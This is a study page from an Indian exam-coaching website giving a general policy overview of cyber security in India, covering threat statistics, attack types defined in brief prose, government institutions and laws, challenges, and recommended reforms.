fbpx

iasaarthi.com

Instagram Telegram Whatsapp Phone-square-alt Facebook Youtube
Saarthi IAS logo
  1. Home
  2. General Studies – 3
Security Issues

CYBER SECURITY

November 27, 2024

CYBER SECURITY

Cyber security is the practice of defending computers, servers, mobile devices, electronic systems, networks, and data from malicious attacks. It’s also known as information technology security or electronic information security. The Information Technology Act, 2000, provides legal recognition for electronic communication, electronic commerce, and cybercrimes, etc.

Data

  • Increase in cybercrime: As per NCRB data from “Crime in India, 2020,” cybercrimes have increased four times or 306 percent in the past four years, and the rate of cybercrime (incidents per lakh population) increased in 2020.
  • India’s vulnerability: India is among the top five targets for cyberattacks in the Asia Pacific (APAC) region, particularly security breaches that involve cyber espionage, as per the “Cyberthreats to Financial Organizations in 2022” report.
  • Threat of ransomware: As per the State of Ransomware 2021, 68% of organizations in India deal with ransomware.

 

Categories of Cyber Security

  1. Network security: It is the practice of securing a computer network from intruders, whether targeted attackers or opportunistic malware.
  2. Application security: It focuses on keeping software and devices free of threats. A compromised application could provide access to the data it is designed to protect.
  3. Information security: It protects the integrity and privacy of data, both in storage and in transit.
  4. Operational security: It includes the processes and decisions for handling and protecting data assets.
  5. Disaster recovery and business continuity: It defines how an organization responds to a cybersecurity incident or any other event that causes the loss of operations or data.
  6. End-user education: It addresses the most unpredictable cybersecurity factor: people. Teaching users to delete suspicious email attachments, not plug in unidentified USB drives, and other important lessons is vital for the security of any organization.

 

Types of Cyber Attacks

  1. Embedding Malware: Cyber criminals have embedded malware into legitimate applications to target poorly secured Wi-Fi spots and passwords, so that they can steal useful information.
  2. Phishing: It is a type of social engineering attack used to steal user data, including login credentials and credit card numbers. It occurs when an attacker, cloaked as a trusted entity, dupes a victim into opening an email, instant message, or text message.
    • For example: Authentication platform Okta confirmed that hackers from the cyber-crime group Lapsus$ had tried intruding into its system three months earlier. The group is relatively new but has successfully breached major firms like Microsoft. It has also publicly taunted their victims, leaking their source code and internal documents.
  3. Man-in-the-middle attacks: It is a general term used when a perpetrator positions themselves in a conversation between a user and an application, to eavesdrop or impersonate one of the parties, making it appear as if a normal exchange of information is underway.
  4. DDoS attack: A DDoS attack involves multiple connected online devices, collectively known as a botnet, which are used to overwhelm a target website with fake traffic.
  5. Cross-site scripting: These attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
  6. SQL Injection attack: It is a type of injection attack that makes it possible to execute malicious SQL statements. Attackers can use SQL Injection vulnerabilities to bypass application security measures.
  7. Cyber espionage: It is a type of cyberattack in which an unauthorized user attempts to access sensitive or classified data or intellectual property for economic gain, competitive advantage, or political reasons.

 

Need for Cyber Security

  1. For individuals
  • Compromise with individual’s data:
    • For example: Domino’s India data leak led to more than 18 crore orders’ data being put up on the dark web for sale; Air India data leak led to the compromise of more than 45 lakh users’ data.
  • Inappropriate use of information: Photos, videos, and other personal information shared by an individual on social networking sites can be inappropriately used by others.
  • Lack of awareness: Almost 80% of cybercrime frauds occur due to a lack of cyber knowledge. During the COVID-19 pandemic, overuse or addiction to social media and increased use of online modes to earn money led to a rise in cybercrimes.
  • Accessibility: Amid the pandemic, sensitive information has become susceptible to security vulnerabilities as firms permitted employees to work from home.
  1. For businesses/organizations
  • E-commerce boom: The Indian e-commerce market is expected to reach US$ 200 billion by 2026. This increases the vulnerability of consumers to online frauds (identity thefts, credit card frauds, etc.).
  • 4th Industrial Revolution: This has led to the rise of the Internet of Things (IoT), artificial intelligence, and machine learning, which would see a more connected environment. This would require communication systems to be secure.
  • Increasing importance of the digital economy: The digital economy today comprises 14-15% of India’s total economy and is targeted to reach 20% by 2024.
  • Lack of private sector: There are only a few Indian companies that make some of the cyber security products, and there is a significant gap in the sector.
  1. For the nation
  • Financial loss: India has lost a huge amount of money each year in cyberattacks. For instance, cybercrimes in India caused losses of ₹1.25 lakh crore in 2019.
  • Regulatory mechanism: The IT Act, 2000, is not equipped to consider new-age changes in the mode of functioning of businesses and modus operandi of crimes in cyberspace.
  • Anonymity: Law enforcement is handicapped by the fact that cybercriminals can operate from anywhere with internet access.
  • Weak digital security: Outdated infrastructure, with poor or inadequate cyber security protection, has exposed India’s digital vulnerability.
    • For example: Aadhaar data leakage.
  • Cyber sabotage: Defined as deliberate and malicious acts that result in the disruption of the normal processes and functions or the destruction or damage of equipment or information.
    • For example: In October 2020, a cyber-sabotage on the Maharashtra State Electricity Board (MSEB) server caused an outage across Mumbai.
  • Sleeper cyberattacks: Sleeping malware is placed or sent to various critical systems and later remotely activated to control or cripple the infrastructure.
  • System vulnerabilities: When cybercriminals spot a weakness, they pounce on it.
    • For example: Software developer SolarWinds was subject to a cyber-attack in 2020. Cybercriminals exploited a vulnerability in the company’s software after employees shared details of the system flaw online.
  • Spearphishing: Refers to sending emails to targets that appear to come from a trusted source to reveal important information or install malware on their systems.
    • For example: ModifiedElephant operators used spearphishing emails to plant incriminating evidence on the personal devices of Indian journalists, human rights activists, and lawyers.
  1. Other Reasons for Cyber Security
  • Multiple Organizations: India has 36 different central bodies that deal with cyber issues, leading to overlapping responsibilities. Lack of coordination further exacerbates the issue.
  • Lack of Resources: India suffers from a lack of manpower, training, and indigenization in hardware and software cyber security tools, pushing it to a more vulnerable position.
    • For example: Unlike Israel’s National Cyber Directorate or the US’s Cybersecurity and Infrastructure Security Agency Act (CISA), India doesn’t have any active mechanism for cyber defense.
  • Critical Infrastructure: Critical infrastructure, such as power systems, transportation systems, and refineries, is vulnerable to data theft and cyberattacks, which could potentially bring the entire economy to a standstill.
  • Government Schemes: Government initiatives such as Digital India, Aadhaar, MyGov, e-Market, DigiLocker, and Bharat Net require enhanced protection against cyberattacks.
  • 5th Arena of War: Cyberspace has emerged as the fifth arena of war (after land, air, water, and space). It is imperative to protect the nation from cyber threats.
  • Increasing Threat of Anti-National Activities: Cyberspace has allowed terrorist groups to remain anonymous and propagate nefarious activities, such as anti-state propaganda and radicalizing the public.
  • Possibility of ‘Fire-Sale’ Assault: This refers to a coordinated attack on connected infrastructure such as transportation, telecommunication, financial, and utility systems. Such attacks could cripple the economy and cause significant human casualties.

 

Other Reasons

  • Increased Vulnerabilities:
    • Large Number of Users: As the second-largest consumer of smart devices and one of the largest bases of internet users, India remains highly vulnerable to both national and international cyberattacks.
    • Work-from-Home Policies: With the increase in remote desktops and work-from-home setups post-pandemic, it has become crucial to establish a robust cybersecurity infrastructure.
  • Increase in Cyber-Attacks: Cyberattacks rose by almost 300% since the outbreak of the pandemic. In 2020, India reported 6.97 lakh cybersecurity incidents in the first eight months alone, nearly matching the total number from the previous four years combined (CERT-In data).
  • Employment Generation: By 2025, there will be 3.5 million cybersecurity jobs globally, representing a 350% increase over eight years, as per Cybersecurity Ventures.
    • For example: India is projected to have about 3.5 lakh unfilled cybersecurity positions across private and public sectors by the same time.


Challenges

  1. Governance-Related Challenges
  • Lack of Awareness and Transparency: The culture of cybersecurity awareness is lacking at both individual and institutional levels. Many agencies are reluctant to declare cybersecurity attacks on their infrastructure.
  • Lack of Coordination: There are multiple cybersecurity agencies in India, but coordination between them is ineffective. The separation between military and civilian cybersecurity infrastructures further complicates response mechanisms.
    • For example: Each state government has its own CERT (Computer Emergency Response Team).
  • Lack of National-Level Architecture: India lacks a national cybersecurity architecture that can unify efforts among various agencies to assess and tackle cyber threats effectively.
  • Lack of Separation: In cyberspace, there are no boundaries. This makes institutions and organizations vulnerable to attacks from anywhere, leading to significant losses in money, property, and even lives.
  • Foreign Dependency: India lacks indigenization in hardware as well as software cyber security tools, increasing susceptibility to cybercrimes.
  • Digital Infrastructure: In India, most people use cheaper smartphones with poor cyber security and privacy features, making them prone to cyber-attacks.
    • For example: States like Punjab, Rajasthan, Goa, and Assam do not have a single cybercrime cell, while in Andhra Pradesh, Karnataka, and Uttar Pradesh, only one or two cybercrime cells have been set up.
  • Data Storage: India is a net information exporter. Its information highways point west, carrying with them the data of millions of Indians.
  • Lack of Uniformity in Devices: There is a widening gap between security features offered by high-end phones and lower-cost mobiles, making it almost impossible for legal and technical standards to be set for data protection by regulators.
  1. Human Resource-Related Issues:
  • Shortage of Manpower: India faces a 9% higher shortage of skilled cyber security professionals compared to the global average. The country needs approximately 1 million cybersecurity professionals (Data Security Council of India).
  • Unskilled Manpower: A majority of cybersecurity applicants are not well qualified, and only a few HR teams understand their cybersecurity hiring needs.
  • Other Issues: Poor financial incentives, limited growth opportunities, and promotion challenges.

 

  1. Other Challenges:
  1. Lack of Awareness: There is no national regulatory policy for cybersecurity, resulting in a lack of awareness at both the company and individual levels.
  2. Growing Chinese Influence: Chinese influence in the Indian telecom space poses additional risks.
  3. Lack of Data Protection Law: The absence of a robust data protection law leaves data unprotected and increases vulnerabilities.

 

Initiatives for Cyber Security – National Level

  1. Legislative Measures
  • Information Technology Act, 2000: Regulates the use of computer systems, networks, and their data. It provides statutory recognition to contracts and electronic authentication, digital signatures, and cybersecurity-related liabilities.
  • Cooperative Federalism: Police and Public Order are State subjects under the Constitution of India. States/UTs are primarily responsible for preventing, detecting, investigating, and prosecuting cybercrimes through their law enforcement mechanisms.
  • New Cybersecurity Guidelines: CERT-In has issued directions to enhance information security practices and mandate reporting of cyber incidents under the provisions of Section 70B of the IT Act, 2000:
  • Reporting: All government and private agencies must mandatorily report all cyber breach incidents to CERT-In within six hours.
  • Log Enabling: Service providers, intermediaries, and government organizations must maintain secure logs of all their ICT systems for 180 days and keep them in Indian jurisdiction.
  • Registration: Virtual private server (VPS) providers must register subscriber names and related data and maintain them securely for five years or longer.
  • Action Taken Report: Service providers must report the actions taken to CERT-In.
  • Network Time Protocol: Service providers must synchronize their ICT systems’ clocks to the Network Time Protocol (NTP) Server of the National Informatics Centre (NIC) or the National Physical Laboratory (NPL).
  1. Policies
  • National Cyber Security Policy, 2013: Outlines a roadmap to create a framework for comprehensive, collaborative, and collective responses to deal with cyber security issues at all levels within the country.
  • National Cyber Security Strategy, 2020: Conceptualized by the National Security Council Secretariat to ensure a safe, secure, trusted, resilient, and vibrant cyberspace for the nation.

 

  • Pillars of Strategy:
    • Secure: Strengthening the National Cyberspace.
    • Strengthen: Enhancing Structures, People, Processes, and Capabilities.
    • Synergize: Efficient utilization of resources, including cooperation and collaboration.
  1. Institutional Measures
  • National Critical Information Infrastructure Protection Centre (NCIIPC): The Government established NCIIPC as the nodal agency to protect critical information infrastructure in the country.
  • National Cybersecurity Coordination Centre (NCCC): India’s cyberspace intelligence agency tasked with screening communications metadata to detect real-time cyber threats. It closely coordinates with law enforcement agencies for intelligence gathering.
  • India’s Computer Emergency Response Team (CERT-In): Mandated under the IT Amendment Act, 2008, CERT-In is responsible for handling and preventing cyber-attacks in India.
  • Indian Cyber-Crime Coordination Centre (I4C) and Cyber Warrior Police Force: Established under the Cyber and Information Security Division to address internet crimes, including cyber threats, child pornography, and online stalking.
  • National Cyber Crime Reporting Portal: Caters specifically to complaints of cybercrimes, focusing on cases involving women and children.
  • Defence Cyber Agency: A tri-service command of the Indian Armed Forces tasked with managing cyber security threats, particularly against hackers from China and Pakistan.
  1. Other Initiatives
  • National Cyber Security Incident Response Exercise (NCX India): Trains senior management and technical personnel from government and critical sector organizations to handle contemporary cyber threats and incidents. Conducted by the National Security Council Secretariat (NSCS).
  • Cyber Swachhta Kendra (Botnet Cleaning and Malware Analysis Centre): Launched to detect malicious programs and provide free tools to remove them.
  • Common Criteria Recognition Arrangement (CCRA): India is recognized as a Certificate Issuing Nation for cyber security under the CCRA framework.
  • Digital Army Programme: Dedicated to digitizing and automating processes, procedures, and services for the Indian Army as part of the Digital India initiative.
  • TechSagar Platform: An online portal offering actionable insights into India’s industrial, academic, and research capabilities across technology areas such as artificial intelligence, cybersecurity, etc.
  • Training of Information Security Personnel: Conducted through 52 institutions under the Information Security Education and Awareness Project. Aims to raise awareness and provide training and research in the field of information security.

 

Initiatives for Cyber Security – International Level

  • Paris Call: A statement of consensus to address global concerns about cyber threats. It focuses on common principles agreed upon by like-minded countries, private sector entities, and civil society organizations.
  • Budapest Convention: A multilateral treaty addressing cyber security by harmonizing national laws, enhancing investigative authorities, and promoting international cooperation. However, India has not signed this treaty.
  • Ground Zero Summit: It is the largest collaborative platform in Asia for cyber security experts and researchers to address emerging cyber security challenges and demonstrate cutting-edge technologies.
  • Internet Corporation for Assigned Names and Numbers (ICANN): A non-profit public benefit corporation that coordinates the Internet Domain Name Servers, IP addresses, and autonomous system numbers.
  • Cooperation with Other Countries: India is collaborating with the UK, USA, China, Malaysia, Singapore, Japan, and others on issues like joint training of cybersecurity professionals, information exchange, law enforcement, and technical capacity building to combat cybercriminal activity.

 

Initiatives for Cyber Security – Regional Level

  • Colombo Security Conclave (CSC): Renamed version of the National Security Advisor (NSA) Level Trilateral on Maritime Security (2011) with India, Sri Lanka, and Maldives as members. Bangladesh, Mauritius, and Seychelles participate as observer states, and the Secretariat is based in Colombo.
  • Pacific Cyber Security Operational Network (PaCSON): A platform for sharing cybersecurity threat information and tools between member states.
  • Singapore-ASEAN Cybersecurity Centre of Excellence (ASCCE): Aims to foster a common understanding of cybersecurity through technical capacity building.
  • YAKSHA: An EU-ASEAN partnership to develop cybersecurity solutions tailored to specific national needs, leveraging EU expertise and local knowledge.
  • ASEAN-Japan Cybersecurity Capacity Building Center (Bangkok): Meant to address obstacles to ASEAN cohesion on cyber-related issues.
  • Skill Development in Cybersecurity: Microsoft has introduced a cybersecurity skill development campaign across 23 geographies, including India, to address the alarming shortage of internet security professionals.

Need for Initiatives for Cyber Security – Regional Level in South Asia

  1. Infrastructural Challenges
  • Digital Economy: The region’s digital economy is projected to grow rapidly, making South Asian nations more vulnerable to cyberattacks, resulting in data breaches or system failures.
    • For example: Organizations in Asia are 80% more likely to be targeted by hackers.
  • Knowledge Gap: There is a lack of practical guidance, security baselines, and frameworks relating to good practices in cybersecurity.
  • Lacking Capabilities and Infrastructure: Many South Asian countries lack strategic mindsets, policy preparedness, and institutional oversight for cybersecurity. There is also a shortage of cybersecurity professionals, with staff retention remaining an issue.
  1. Coordination Challenges
  • Lack of Global Consensus: The absence of a breakthrough in the implementation of global cyber norms highlights the need for regional cooperation.
  • Lack of Regional Coordination: South Asian nations often limit the sharing of threat intelligence due to mistrust and a lack of transparency. The absence of a unifying framework leads to significant underinvestment in cybersecurity.
  1. Security Challenges
  • Rapid Technological Advancement: This makes threat monitoring and response more difficult, especially with more powerful encryption, cloud computing, and the widespread growth of the Internet of Things (IoT).
  • Weaponization of Social Media: Continually evolving cyber-attacks use disinformation, concealment, and deception to create strategic uncertainty and increase the potential for cyber warfare.
  • Potential Use by States: A number of states are developing ICT capabilities for military purposes. The use of ICTs in future conflicts among states is becoming increasingly likely.

 

Way Forward

  1. Policy Measures
  • Integrated Cyber Security Command: At present, India follows a sector-specific policy for cyber security, which hampers coordinated efforts. There is a need for an integrated cyber security command.
  • Establish National Cyber Security Commission (NCSC): This commission would coordinate with all ministries to manage National Critical Information Infrastructure (NCI) in their respective areas and play a catalytic role in fulfilling the military’s requirements in cyber warfare.
  • Upgrade Cyber Cells: Existing cyber cells require upgrades, such as setting up dark web monitoring cells and social media monitoring cells, while inducting technical experts along with traditional police recruitment.
  • Strengthening Existing Cyber Security Framework: National cybersecurity projects like the NCCC, NCIIPC, and CERT need to be strengthened manifold and periodically reviewed.
  • Cyber-Resilience: This refers to a three-pronged process:
    • Proactively prepare for disruptions.
    • Respond to them effectively.
    • Recover swiftly.
  • Dedicated Cadre of Officers for Cyberspace: Consider creating a specialized cadre, such as a Digital Armed Force, dedicated to cyberspace operations.
  • Never Trust, Always Verify Approach: Transition from the “trust but verify” model to the “never trust, always verify” security model to enhance cyber-resilience.
  • Multi-Agency Organization: Establish a well-equipped multi-agency organization to address possible threats against the country’s critical resources.
  • Integrated Approach: Given the increasing dominance of mobile and telecommunication, the National Cyber Security Policy and the National Telecom Policy must coalesce to create a comprehensive policy for 2030.
  1. Implementing Gulshan Rai Committee Recommendations
  • Reducing Dependence on Foreign Servers: Create a dedicated secure gateway for all government communication.
  • Cyber Forensic Labs: Set up cyber forensic laboratories in all states to investigate and respond to cyber incidents effectively.
  • Awareness Generation: Sensitize people and institutions to the importance of reporting cyberattacks promptly to enable timely action.
  1. Other Measures
  • Strengthen Resources (R&D): Invest in research and development to build offensive cyber capabilities and bolster national cyber defense.
  • Offensive Capacity: Focus on enhancing offensive cyber capabilities rather than relying solely on defensive measures.
  • Coordination: Increase inter-ministerial and inter-state coordination on cyber security to address shared challenges.
  • Map Hotspot Areas: Identify and monitor cybercrime hotspots to prevent future attacks.
  • Proper Investigations: Develop and upgrade cyber forensic capabilities to handle emerging cybercrimes effectively, particularly in the domains of big data, Internet of Things (IoT), and mobility.
  1. Measures to Improve Cyber Security at Regional Level
  • Cyber Security in Education: Educational institutions, including central universities, private universities, industry associations, and Industrial Training Institutes (ITIs), should incorporate courses on cybersecurity.
  • Promoting Indigenization: There is a need to create opportunities for developing software to safeguard cyber security and digital communications.
  • AI and Machine Learning to Boost Cyber Defenses: As artificial intelligence and machine learning gather pace and influence more industries, they will play a larger role in cybersecurity.
  • 4D Principle for Cyber Security: India requires a strong cybersecurity framework based on the “4D principles”: Deter, Detect, Destroy, and Document, to thwart any cyber challenges.
  • Coordination Initiatives: Cyber norm implementation should prioritize regional organizations through a multi-stakeholder approach involving non-state actors, such as civil society organizations.
  • Capacity Building: Enhance cooperation with organizations like the Global Forum on Cyber Expertise (GFCE) to protect critical infrastructure, share information, and reduce conflict risks.
  • Awareness Generation: Launch awareness campaigns and develop guidelines or educational programs to educate mainstream users on basic cybersecurity hygiene.
  • Dynamic Management of Cybersecurity: Relevant actors should adopt and implement dynamic management of cybersecurity, including:
    • Vulnerability management.
    • Bug bounty programs.
    • Vulnerability handling processes.
  • Harmonizing Behavior in Public and Private Sectors: Ensure harmonization across national regulatory and industry approaches while creating incentives for security-focused behavior in both the public and private sectors.

 

Best Practices

  1. United States Cyber Command: The USA has a separate cyber command center tasked with countering adverse cyber activities. It is one of the 11 unified commands under the US Department of Defense.
  2. Cyberdome, Kerala: A Center of Excellence for Kerala Police, designed to address long-term security challenges in cyberspace. It bridges the gap between emerging innovations and the skills needed by Kerala Police to combat cyber threats.
  3. Cyber Safe Women, Maharashtra: An initiative conducting awareness camps across all districts in Maharashtra to educate women on cyber safety.

 

CYBER SECURITY

Leave a Comment

Related Posts

error: Content is protected !!